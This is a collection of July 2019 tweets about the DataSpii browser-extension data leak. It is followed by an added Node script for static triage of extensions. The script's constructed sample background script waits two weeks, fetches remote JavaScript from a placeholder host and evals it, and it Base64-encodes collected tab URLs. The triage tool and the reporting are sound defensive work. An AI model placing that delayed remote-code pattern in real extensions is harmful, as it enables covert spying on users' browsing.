... Thousands of extensions ask for and get that access from users who have no reason to know that, say, the URLs they click on will be shared for "marketing" purposes, eventually finding their way to brokers like Nacho Analytics, who then sell the data to anyone who pays ...
— Jonathan Zittrain (@zittrain) July 18, 2019
"After we disclosed the leaks to browser makers, Google remotely deactivated seven extensions, and Mozilla did the same to two others" https://t.co/D2iD8dpJpV
— John Wilander (@johnwilander) July 18, 2019
Some fascinating technical detail from @dangoodin001 about the browser extensions that slurp up and share browsing data: https://t.co/lWW1KtNaYz.
— Jonathan Zittrain (@zittrain) July 18, 2019
What jumps out are the extensions' obfuscations of their activities, such as by waiting a couple weeks before sending telemetry back.
What makes this data useful -- saleable -- is not separable from what makes it invasive. This is a peek into a pervasive but hidden ecosystem. A duck's feet madly paddling beneath the surface, while all most see is it serenely gliding across a pond. Read the marketing: pic.twitter.com/Hy00Zk0aYA
— Jonathan Zittrain (@zittrain) July 18, 2019
Security researchers focus on Chrome extensions — but we found leaky ones for Firefox & Opera, too.
— Geoffrey A. Fowler (@geoffreyfowler) July 18, 2019
We did not find any for Safari. That could be the result of effort by Apple — or just be a sign of how small its market share is among desktop browsers. https://t.co/Kx704CfJpi
This is a compelling account of data leakage through dodgy but popular browser extensions. To do a small useful task -- like letting you easily zoom in a picture on a web page -- an extension will ask for full permissions to read and modify everything you see as you surf. ... https://t.co/ny1XCXFnLT
— Jonathan Zittrain (@zittrain) July 18, 2019
From DrChrono, a medical records service, we saw the names of patients, doctors, and even medications. From another service, called Kareo, we saw patient names. https://t.co/qHs3vWEC7C Shocking! What's your data worth?
— Timicoin/TimiDNA (@timicoin) July 18, 2019
DataSpii: The catastrophic data leak via browser extensions (Jul 18) https://t.co/xDR9Zydsfh TL;DR: be very careful about installing browser extensions, or face serious privacy/security risks. Attached pic: extensions that you probably don't want... (read article) /c @_cryptome_ pic.twitter.com/DZGPwCbnIK
— Matthijs R. Koot (@mrkoot) July 19, 2019
This is what's wrong with the internet economy:
— Shira Ovide (@ShiraOvide) July 18, 2019
There is no way that people who download a browser add-on to enlarge their photos are consenting in any real way to have their information sold to marketers. pic.twitter.com/Y7jCGao8cm
Time to look into your Chrome and Firefox extensions via @geoffreyfowler @washpostbiz https://t.co/nLsy8qv5cF
— Michelle Gaps (@michellegaps) July 18, 2019
The company's web site today has a splash screen crafted in response to @geoffreyfowler and @sam_jadali's worthy spadework. It's chef's-kiss level denial and counter-charge. "...an individual exploited our tool specifically to seek out security flaws in less-secure web sites." pic.twitter.com/b4rPwTXa8F
— Jonathan Zittrain (@zittrain) July 18, 2019
The writer has used "we" or "I" in numerous tweets from Thursday to give the same false narrative that his role was different than one of a journalist. I asked him to correct or clarify his story. A few hours later he tweeted this: 10/13 https://t.co/oR8rk1pCzd
— Dan Goodin (@dangoodin001) July 19, 2019
I'll be quiet about this soon, I promise. But here's an example of people thinking the writer did more than simply spend a few weeks reporting a researcher's findings. https://t.co/i3su9aPMXa
— Dan Goodin (@dangoodin001) July 19, 2019
My main story is: https://t.co/wztoSI6enE
— Dan Goodin (@dangoodin001) July 19, 2019
My technical deep-dive is: https://t.co/aOfMTbjusw
WaPo post is: https://t.co/8YQ0MrJ4Ed
It turns out a lot of private data ends up in a URL. Long, un-guessable URLs are ways of referring to private Google Drive or OneDrive docs. They contain record locators and passenger names for airline flights. And those extensions read it all and pass it along. pic.twitter.com/cOZ2JHWeBm
— Jonathan Zittrain (@zittrain) July 18, 2019
A colleague of mine, @dangoodin001, has deeply reported a story on browser extensions that spied on up to 4 million users. Of note, Blue Origin was caught up in the mess.https://t.co/uAfXUqsxFz
— Eric Berger (@SciGuySpace) July 18, 2019
We should NOT allow the internet to remain a giant personal-information sucking nightmare. @geoffreyfowler sheds light on the Web browser add-ons that watch everything you do online, for money. https://t.co/tnO1bq72cs
— Shira Ovide (@ShiraOvide) July 18, 2019
The core discovery in my column today comes from @sam_jadali, an independent researcher who spent half a year tracking and testing leaky extensions after finding some of his own clients’ data for sale.
— Geoffrey A. Fowler (@geoffreyfowler) July 18, 2019
Read his whole “DataSpii” report here: https://t.co/ngX8DFmF3C
That's right. "This isn't the same data you'd see from SpyFu, SEMrush, or ahrefs." Not household names. By design.
— Jonathan Zittrain (@zittrain) July 18, 2019
This system can't be patched or retrofitted. Its success depends on the lie of informed consent, on obscurity, and on dismissing invasive pieces as rounding errors.
DataSpii: The catastrophic data leak via browser extensions (SUMMARY) <oh my. Browser extension data leaks https://t.co/SgmRvQni12
— Privacy Matters (@PrivacyMatters) July 19, 2019
But 8 minutes later, he went on to tweet something that once again gives this false impression he helped arrive at the primary findings, rather than simply having the primary findings shared with him months after the researcher arrived at them. 11/13 https://t.co/hO1Udeo9Fj
— Dan Goodin (@dangoodin001) July 19, 2019
[Ars Technica] More on DataSpii: how the collected data was hidden, and how it got caught https://t.co/hIoCbW3F7z
— 라루얀 / 말썽쟁이 구운 경단 ? (@LaruYan) July 18, 2019
The data sent to Nacho Analytics is converted to Base64 and compressed to hinder detection. Right after installation the extension only hands analytics to its developer, but a month later it downloads an obfuscated JS file and sends the web activity history it has collected.
There is a crucial element missing in the article below: how were the extensions able to execute remote code in their own context? By default, this is not possible. (cc. @dangoodin001) https://t.co/SY6Jc7dTW4
— R. Hill (@gorhill) July 18, 2019
You may find my coverage interesting: https://t.co/wztoSI6enE https://t.co/aOfMTbjusw
— Dan Goodin (@dangoodin001) July 18, 2019
My browser, the spy: How extensions slurped up browsing histories from 4M users https://t.co/Rg5Iza8u6s
— Dan Goodin (@dangoodin001) July 18, 2019
Ars relates the story of 1 man's efforts to identify spyware that gathered browser histories from 4M users. It's about browser add-ons, which can "behave" for months before downloading the spyware. I don't use many, and am dumping the ones I use. #spyware https://t.co/u0THfcB6dR
— Jeff Duntemann (@JeffDuntemann) July 19, 2019
.@Techmeme updated the link to the DataSpii story to now feature @dangoodin001 and @arstechnica's story, rather than the misleading @washingtonpost piece, FYI https://t.co/w8CcKuqH8i pic.twitter.com/KugF7ifJut
— Emily Dreyfuss (@EmilyDreyfuss) July 19, 2019
For my OpSec friends, I wish there was a way I could translate this outstanding work for civilians. It's a cogent and well-researched report on personal data *theft*. What's worse, your data may well be inside the cache: https://t.co/Jq3W2gKvWm @dangoodin001
— Tom Henderson (@extremelabs) July 18, 2019
How web browser extensions slurped up browsing histories from 4 million users https://t.co/jttRQ15VY2 pic.twitter.com/BC9MdRFXLN
— Graham Cluley (@gcluley) July 19, 2019
Wow. @dangoodin001 did months of hard work on the browser extension data leak story and it seems like the WaPo totally misrepresented its version of events after parachuting in at the last minute. https://t.co/tD7Wj6EmIm https://t.co/uPY1LfZFyd
— Zack Whittaker (@zackwhittaker) July 19, 2019
These 6 popular browser extensions are selling your data https://t.co/8uIki4L90h
— The IoT Warehouse (@TheIotWarehouse) July 18, 2019
Data leak warning for millions of Google Chrome and Firefox extension users https://t.co/8DFOM78wrI
— editoy (@editoy) July 20, 2019
• This payload contains a minified JavaScript file that collects the user's browsing data and sends it to a server controlled by the developer.
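Added editorial example, not code from the DataSpii report, the Ars Technica or Washington Post coverage, or any extension named in this thread: a static triage script (run with Node) for the red flags the tweets above describe, namely broad host access, a delay before activation, collection of tab URLs, Base64 encoding before upload, and a relaxed extension content_security_policy. The last one bears on the "how did remote code run in the extension's own context" question raised above: a Manifest V2 extension gets script-src 'self'; object-src 'self' by default, and loosening that with 'unsafe-eval' or a remote script host is one way a fetched payload can run in the extension's own pages (the script flags it without claiming which mechanism the reported extensions used). The manifest keys are real Manifest V2 keys; the sample manifest, the sample background script and the scoring heuristics are constructed for illustration and are assumptions of this example.

```javascript
// Static triage of a browser extension for the red flags described in this thread.
// Added example; the sample manifest, background script and heuristics are constructed
// for illustration (assumptions), not code recovered from any reported extension.

const BROAD_HOSTS = new Set(['<all_urls>', 'http://*/*', 'https://*/*', '*://*/*']);
const DATA_PERMISSIONS = new Set(['tabs', 'history', 'webRequest', 'webNavigation']);
const ONE_DAY_MS = 24 * 60 * 60 * 1000;

// Largest millisecond value spelled out in the source as a literal or a product of
// literals, e.g. 14 * 24 * 60 * 60 * 1000 (a two-week wait before activation).
function longestDelayMs(code) {
  let max = 0;
  for (const m of code.matchAll(/\b\d+(?:\s*\*\s*\d+)*\b/g)) {
    const value = m[0].split('*').reduce((acc, n) => acc * Number(n.trim()), 1);
    if (value > max) max = value;
  }
  return max;
}

function auditManifest(manifest) {
  const findings = [];
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  const broad = perms.filter((p) => BROAD_HOSTS.has(p));
  if (broad.length) findings.push({ rule: 'broad-host-access', detail: broad.join(', ') });
  const data = perms.filter((p) => DATA_PERMISSIONS.has(p));
  if (data.length) findings.push({ rule: 'browsing-data-permission', detail: data.join(', ') });
  const csMatches = (manifest.content_scripts || []).flatMap((cs) => cs.matches || []);
  if (csMatches.some((m) => BROAD_HOSTS.has(m))) {
    findings.push({ rule: 'content-script-on-all-pages', detail: csMatches.join(', ') });
  }
  // Manifest V2 default is "script-src 'self'; object-src 'self'": no eval() and no
  // remote scripts in the extension's own pages. A manifest that loosens it re-enables both.
  const csp = typeof manifest.content_security_policy === 'string' ? manifest.content_security_policy : '';
  const scriptSrc = ((csp.match(/script-src([^;]*)/) || [])[1] || '').trim();
  if (/'unsafe-eval'/.test(scriptSrc)) findings.push({ rule: 'csp-allows-eval', detail: scriptSrc });
  if (/https?:\/\//.test(scriptSrc)) findings.push({ rule: 'csp-allows-remote-script', detail: scriptSrc });
  return findings;
}

function auditSource(code) {
  const findings = [];
  const rules = [
    ['dynamic-code-execution', /\beval\s*\(|\bnew\s+Function\s*\(/],
    ['remote-code-fetch', /\bfetch\s*\(\s*['"`]https?:|\bXMLHttpRequest\b/],
    ['url-collection', /\b(?:chrome|browser)\.(?:tabs\.onUpdated|tabs\.query|webNavigation\.\w+|webRequest\.\w+)/],
    ['base64-before-upload', /\bbtoa\s*\(/],
  ];
  for (const [rule, re] of rules) {
    const m = code.match(re);
    if (m) findings.push({ rule, detail: m[0] });
  }
  const delay = longestDelayMs(code);
  if (/\bset(?:Timeout|Interval)\s*\(/.test(code) && delay >= ONE_DAY_MS) {
    findings.push({ rule: 'delayed-activation', detail: `${delay / ONE_DAY_MS} day(s)` });
  }
  return findings;
}

function auditExtension(manifest, sources) {
  const findings = auditManifest(manifest);
  for (const [file, code] of Object.entries(sources)) {
    for (const f of auditSource(code)) findings.push({ file, ...f });
  }
  return findings;
}

// Constructed sample: a "zoom pictures" extension that asks for everything.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: 'Picture Zoom (constructed sample)',
  version: '1.0',
  permissions: ['tabs', 'storage', '<all_urls>'],
  content_security_policy: "script-src 'self' 'unsafe-eval' https://cdn.example.invalid; object-src 'self'",
  background: { scripts: ['background.js'] },
};
const SAMPLE_SOURCES = {
  'background.js': `
    const ACTIVATE_AFTER = 14 * 24 * 60 * 60 * 1000;  // lie low for two weeks
    setTimeout(() => {
      fetch('https://cdn.example.invalid/update.js').then((r) => r.text()).then((src) => eval(src));
    }, ACTIVATE_AFTER);
    const seen = [];
    chrome.tabs.onUpdated.addListener((id, info) => { if (info.url) seen.push(btoa(info.url)); });
  `,
};

console.log(JSON.stringify(auditExtension(SAMPLE_MANIFEST, SAMPLE_SOURCES), null, 2));
```

To triage a real unpacked extension, read its manifest.json and script files from disk and pass them to auditExtension. The heuristics are deliberately coarse: legitimate extensions also call setTimeout and btoa, so the output is a triage list to read, not a verdict.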
Cool new browser extension? Yeah, about that. Once again, if it's free, you're the product. Or rather your data is. https://t.co/d1DDodxKtf
— Buck Woody (@BuckWoodyMSFT) July 20, 2019
New report on browser extensions selling *highly* sensitive personal data on millions of users. EU authorities must immediately start to investigate the browser extension data industry.
— Wolfie Christl (@WolfieChristl) July 19, 2019
Report: https://t.co/wiuRUDEsyb
Articles: https://t.co/8b6Rjadtdq https://t.co/KNxqZIzm3b
My browser, the spy: How extensions slurped up browsing histories from 4M users https://t.co/Befw2iMxdX pic.twitter.com/slKatSGimf
— Aaron Parker (@stealthpuppy) July 19, 2019
It's almost as if removing as many useful features as possible from modern browsers and then pushing users to install random third-party extensions that aren't vetted at all to regain them is a really bad idea. Who would have thought? https://t.co/HJmY84c3sy
— byuu (@byuu_san) July 20, 2019
My browser, the spy: How extensions slurped up browsing histories from 4M users https://t.co/38xIpO5ngh pic.twitter.com/0DnAHRWlA6
— Rich Tehrani (@rtehrani) July 18, 2019
Be careful with those browser extensions... My browser, the spy: How extensions slurped up browsing histories from 4M users https://t.co/umrA0vN3F8
— Mikko Piippo (@mikkopiippo) July 20, 2019